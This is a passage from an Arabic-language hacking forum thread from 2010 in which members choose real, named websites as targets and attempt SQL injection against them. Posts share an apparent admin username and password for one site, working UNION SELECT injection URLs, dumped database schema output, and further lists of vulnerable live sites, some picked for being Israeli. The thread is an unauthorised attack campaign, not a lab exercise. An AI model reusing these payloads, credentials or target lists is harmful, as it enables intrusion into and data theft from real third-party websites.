التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-03-2010, 04:45 PM   رقم المشاركة : 76 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة عبد الله ر
تتمة حفن الموقع
www.conflictanddevelopment.org

تم التوصل للوحة الادارة وهذه هي
http://www.conflictanddevelopment.org/myadmin

ولكن عند تسجيل الدخول باليوزر والباس
اليوزر Administrator
الباس piping

تعطي هذا الخطأ
maaf login anda tidak dikenal silahkan periksa kembali

قمت بترجمته في غوغل وكانت النتيجة كالتالي
آسف لتسجيل الدخول الخاص بك هو غير معروف يرجى العودة

وهي باللغة الإندونيسية
شو الخطا
ارجو المشاهدة من اجميع والخبراء


اسف اخي العزيز dr.cc9 او Dr.SoLiTaRy

مثل ما تحب ان اناديك
ولكنني لم انتبه انك حقنته قبلي
بس مو مشكلة المهم الواحد يتعلم
مشكور


[align=center]المعلومات الخاصة بالدخول صحيحة 100%
لكن هذا الموقع غريب شوي
يعني الموقع فيه تقريبا 100 لوحة دخول وكلهم تقريبا لمن تفتحهم يطلع عامللهم تصريح للدخول...
لكن انا لقيت هاي الصفحات :
http://www.conflictanddevelopment.org/checkuser.php
http://www.conflictanddevelopment.org/myadmin/
http://www.conflictanddevelopment.org/logout/index.php

وطبعا هي هاي اصلا مش لوحات للدخول هاي مجرد تجربة يعني مثلا الرابط الاول
هو فقط تجربة للعضوية لا دخول والثاني هو دخول خطا من الاصل والثالث هو تسجيل خروج
وهاي كلها ما بتفيد
لازم نتخلص من التصريح الي موجود على باقي الصفحات مثل هاي :
http://www.conflictanddevelopment.org/log-in.asp

اقتباس
Forbidden

You don't have permission to access /log-in.asp on this server.

عموما هذا الهدف الجديد : http://www.estaciontierra.com/artist...sta.php?id=201

بالتوفيق
تحياتي




[/align]
التوقيع

^_^



 

   

قديم 08-03-2010, 05:07 PM   رقم المشاركة : 77 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي


Back !

بالنسبة لهذا الموقع http://www.conflictanddevelopment.org/

فهو ليس غريب و إنما فيه لوحة الدخول و لكن غير مصرحة يعني فقط الـ ADMIN الذي يستطيع الدخول

ها هو رابط اللوحة : http://www.conflictanddevelopment.org/admin.asp

بالتويق
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

قديم 08-03-2010, 05:15 PM   رقم المشاركة : 78 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي


جاري حقن الهدف الجديد

للأسف سيرفر الموقع كثير ثقيل :(

يعني كل ما تدخل شيء تنتظر 5 دقائق

جاري ...!
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

قديم 08-03-2010, 05:25 PM   رقم المشاركة : 79 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Syst3m-32
جاري حقن الهدف الجديد

للأسف سيرفر الموقع كثير ثقيل :(

يعني كل ما تدخل شيء تنتظر 5 دقائق

جاري ...!

[align=center]احقنو بسرعة...
وليك عشر ايميلات مخترقة
^^
انا راح انتظرك
تحياتي
[/align]
التوقيع

^_^



 

   

قديم 08-03-2010, 05:25 PM   رقم المشاركة : 80 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي


راح أترك الموقع للأعضاء

و الله العظيم ثقيل جدا جدا

ليس النت هي الثقيلة و إنما السيرفر المرفوع عليه الموقع

بالتوفيق
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

قديم 08-03-2010, 05:28 PM   رقم المشاركة : 81 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Syst3m-32
راح أترك الموقع للأعضاء

و الله العظيم ثقيل جدا جدا

ليس النت هي الثقيلة و إنما السيرفر المرفوع عليه الموقع

بالتوفيق

[align=center]اوك مش مشكلة حبيبي...
ننتظر البقية وان شاء الله الهدف الي بعدو راح احاول القيلك موقع سريع بالتصفح
تحياتي
[/align]
التوقيع

^_^



 

   

قديم 08-03-2010, 07:07 PM   رقم المشاركة : 82 (permalink)
معلومات العضو
 
إحصائية العضو





medoo_mohamed غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
medoo_mohamed is on a distinguished road

افتراضي


موقع لسكربت اسرائيلى مصاب بثغرة السيكول ومعظم المواقع المركب عليها السكربت مواقع اسرائيلية

http://flexible.co.il/services_cat.asp?ccategory=11%27

ننتظر ممن لهم الخبرة فى مايكروسوفت اكسس

   

قديم 08-03-2010, 07:44 PM   رقم المشاركة : 83 (permalink)
معلومات العضو
 
إحصائية العضو





medoo_mohamed غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
medoo_mohamed is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Master vbspiders
[align=center]المعلومات الخاصة بالدخول صحيحة 100%
لكن هذا الموقع غريب شوي
يعني الموقع فيه تقريبا 100 لوحة دخول وكلهم تقريبا لمن تفتحهم يطلع عامللهم تصريح للدخول...
لكن انا لقيت هاي الصفحات :
http://www.conflictanddevelopment.org/checkuser.php
http://www.conflictanddevelopment.org/myadmin/
http://www.conflictanddevelopment.org/logout/index.php

وطبعا هي هاي اصلا مش لوحات للدخول هاي مجرد تجربة يعني مثلا الرابط الاول
هو فقط تجربة للعضوية لا دخول والثاني هو دخول خطا من الاصل والثالث هو تسجيل خروج
وهاي كلها ما بتفيد
لازم نتخلص من التصريح الي موجود على باقي الصفحات مثل هاي :
http://www.conflictanddevelopment.org/log-in.asp



عموما هذا الهدف الجديد : http://www.estaciontierra.com/artist...sta.php?id=201

بالتوفيق
تحياتي




[/align]

هذه هى الجداول والاعمدة الخاصة بالموقع لكن عند البحث عن عمود اليوزر والباص يكون غير موجود بالاسم المتداول

وعند استدعاء اى اعمدة فالموقع لا يستجيب

كود PHP:
CHARACTER_SETS:CHARACTER_SET_NAME:information_schema,
CHARACTER_SETS:DEFAULT_COLLATE_NAME:information_schema,
CHARACTER_SETS:DESCRIPTION:information_schema,
CHARACTER_SETS:MAXLEN:information_schema,
COLLATIONS:COLLATION_NAME:information_schema,
COLLATIONS:CHARACTER_SET_NAME:information_schema,
COLLATIONS:ID:information_schema,
COLLATIONS:IS_DEFAU Estacion Tierra Mondomix Musicas del Mundo

COLLATIONS
:COLLATION_NAME:information_schema,
COLLATIONS:CHARACTER_SET_NAME:information_schema,
COLLATIONS:ID:information_schema,
COLLATIONS:IS_DEFAULT:information_schema,
COLLATIONS:IS_COMPILED:information_schema,
COLLATIONS:SORTLEN:information_schema Estacion Tierra Mondomix Musicas del Mundo

CHARACTER_SETS
:CHARACTER_SET_NAME:information_schema,
CHARACTER_SETS:DEFAULT_COLLATE_NAME:information_schema,
CHARACTER_SETS:DESCRIPTION:information_schema,
CHARACTER_SETS:MAXLEN:information_schema Estacion Tierra Mondomix Musicas del Mundo

PROFILING
:QUERY_ID:information_schema,
PROFILING:SEQ:information_schema,
PROFILING:STATE:information_schema,
PROFILING:DURATION:information_schema,
PROFILING:CPU_USER:information_schema,
PROFILING:CPU_SYSTEM:information_schema,
PROFILING:CONTEXT_VOLUNTARY:information_schema,
PROFILING:CONTEXT_INVOLUNTARY:information_schema,
PROFILING:BLOCK_OPS_IN: | Estacion Tierra Mondomix Musicas del Mundo 

   

قديم 08-03-2010, 08:18 PM   رقم المشاركة : 84 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة medoo_mohamed
هذه هى الجداول والاعمدة الخاصة بالموقع لكن عند البحث عن عمود اليوزر والباص يكون غير موجود بالاسم المتداول

وعند استدعاء اى اعمدة فالموقع لا يستجيب

كود PHP:
CHARACTER_SETS:CHARACTER_SET_NAME:information_schema,
CHARACTER_SETS:DEFAULT_COLLATE_NAME:information_schema,
CHARACTER_SETS:DESCRIPTION:information_schema,
CHARACTER_SETS:MAXLEN:information_schema,
COLLATIONS:COLLATION_NAME:information_schema,
COLLATIONS:CHARACTER_SET_NAME:information_schema,
COLLATIONS:ID:information_schema,
COLLATIONS:IS_DEFAU Estacion Tierra Mondomix Musicas del Mundo

COLLATIONS
:COLLATION_NAME:information_schema,
COLLATIONS:CHARACTER_SET_NAME:information_schema,
COLLATIONS:ID:information_schema,
COLLATIONS:IS_DEFAULT:information_schema,
COLLATIONS:IS_COMPILED:information_schema,
COLLATIONS:SORTLEN:information_schema Estacion Tierra Mondomix Musicas del Mundo

CHARACTER_SETS
:CHARACTER_SET_NAME:information_schema,
CHARACTER_SETS:DEFAULT_COLLATE_NAME:information_schema,
CHARACTER_SETS:DESCRIPTION:information_schema,
CHARACTER_SETS:MAXLEN:information_schema Estacion Tierra Mondomix Musicas del Mundo

PROFILING
:QUERY_ID:information_schema,
PROFILING:SEQ:information_schema,
PROFILING:STATE:information_schema,
PROFILING:DURATION:information_schema,
PROFILING:CPU_USER:information_schema,
PROFILING:CPU_SYSTEM:information_schema,
PROFILING:CONTEXT_VOLUNTARY:information_schema,
PROFILING:CONTEXT_INVOLUNTARY:information_schema,
PROFILING:BLOCK_OPS_IN: | Estacion Tierra Mondomix Musicas del Mundo 

[align=center]بالنسبة للاسماء الخاصة بعمود الباس واليوزر اي فعلا هي مش متواجدة بالاسم الاعتيادي...
بس الموقع لمن جربت افتح احد العواميد فتحت عادي وهذا المثال :

كود PHP:
http://www.estaciontierra.com/artistas/artista.php?id=-201+union+select+1,artista,3,4,5,6,7,8,9,10,11,12,13,14+from+artistas-- 
لي عودة مرة ثانية باذن الله...
تحياتي
[/align]
التوقيع

^_^



 

   

قديم 08-03-2010, 08:25 PM   رقم المشاركة : 85 (permalink)
معلومات العضو
 
إحصائية العضو





medoo_mohamed غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
medoo_mohamed is on a distinguished road

افتراضي


نعم لكن عند استخدام الامر concat على اى اعمدة لا يستجيب الموقع لامر عرض ما بداخل الاعمدة وهذا ما اقصد

مثلا

كود PHP:
http://www.estaciontierra.com/artistas/artista.php?id=-201%20UNION%20SELECT%201,group_concat%28CHARACTER_SET_NAME,0x3a,MAXLEN%29,3,4,5,6,7,8,9,10,11,12,13,14+from+CHARACTER_SETS-- 
لا تستجيب

التعديل الأخير تم بواسطة medoo_mohamed ; 08-03-2010 الساعة 08:28 PM.

   

قديم 08-03-2010, 09:23 PM   رقم المشاركة : 86 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة medoo_mohamed
نعم لكن عند استخدام الامر concat على اى اعمدة لا يستجيب الموقع لامر عرض ما بداخل الاعمدة وهذا ما اقصد

مثلا
كود PHP:
http://www.estaciontierra.com/artistas/artista.php?id=-201%20UNION%20SELECT%201,group_concat%28CHARACTER_SET_NAME,0x3a,MAXLEN%29,3,4,5,6,7,8,9,10,11,12,13,14+from+CHARACTER_SETS-- 
لا تستجيب

[align=center]هو بيقول :

اقتباس
SQL server reply: Table 'estacion_estaciontierra.CHARACTER_SETS' doesn't exist

يعني عمبيقول العمود مش موجود...
انت متاكد من هذا العمود ؟


[/align]
التوقيع

^_^



 

   

قديم 08-03-2010, 10:14 PM   رقم المشاركة : 87 (permalink)
معلومات العضو
 
إحصائية العضو





DeadTerrorist غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DeadTerrorist is on a distinguished road

افتراضي


انا اظن ان ذلك السكرتب فقط لتجربة في ذلك الموقع لا غير او ان الحماية كتييرة عليه

التوقيع

[align=center]i Am
deadTerrorist


Msn:c0v2@hotmalil.com
Or
Mr.M4ROC@hotmail.fr[/align]

 

   

قديم 08-04-2010, 12:53 PM   رقم المشاركة : 88 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


[align=center]تم تغير الهدف...
هذا الهدف الجديد : http://www.araob.com/news.php?id=1204

ملاحضة : الي يحقن الموقع لا يغير الاندكس ولا الباس ولا يغير اي شي بالموقع لانه موقع عربي..
نحن راح نحقن القاعدة وبعدها راح نراسل الادارة بخصوص الثغرة والترقيع
تحياتي


[/align]

التوقيع

^_^



 

   

قديم 08-04-2010, 12:56 PM   رقم المشاركة : 89 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


[align=center]موقع قناة غنوة مصاب :
http://www.ginwah.com/default.asp?peagSh=CatPage&ID=5
تحياتي

[/align]

التوقيع

^_^



 

   

قديم 08-04-2010, 06:06 PM   رقم المشاركة : 90 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي


اقتباس
تم تغير الهدف...
هذا الهدف الجديد : http://www.araob.com/news.php?id=1204

ملاحضة : الي يحقن الموقع لا يغير الاندكس ولا الباس ولا يغير اي شي بالموقع لانه موقع عربي..
نحن راح نحقن القاعدة وبعدها راح نراسل الادارة بخصوص الثغرة والترقيع
تحياتي

ما بعرف إذ كانت الثغرة مرقعة أو شو ! لكن هذا الموقع لم أستطع حقنه

يا غالي أنت المشرف على هذا الموضوع لازم تضع مواقع ( هدف ) أنت حقنته من قبل

لا تقم بوضع موقع مستحيل حقنه ( لو كان صعب عادي )

لأنو هكذا المبتدئين راح يكرهوا الحقن بسرعة و يملوا منه يا غالي

إن شاء الله تتقبل رأيي و هذا هدف هدية لك :

كود:
 http://www.talkeetnachamber.org/news.php?id=158
من يا ترى لي يحقنه الأول ؟؟ هو سهل بس يبغى شوي ذكاء

و أي مساعدة أنا هنا

بالتوفيق
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

موضوع مغلق

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
العدد (3) من غرفة الحقن darkman.dz SQL قواعد البيانات 397 12-30-2010 01:23 PM
جهاز من غرفة جـنـسـيـة MasTer MiND Hackers Showoff 6 06-25-2009 04:01 PM


الساعة الآن 08:11 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0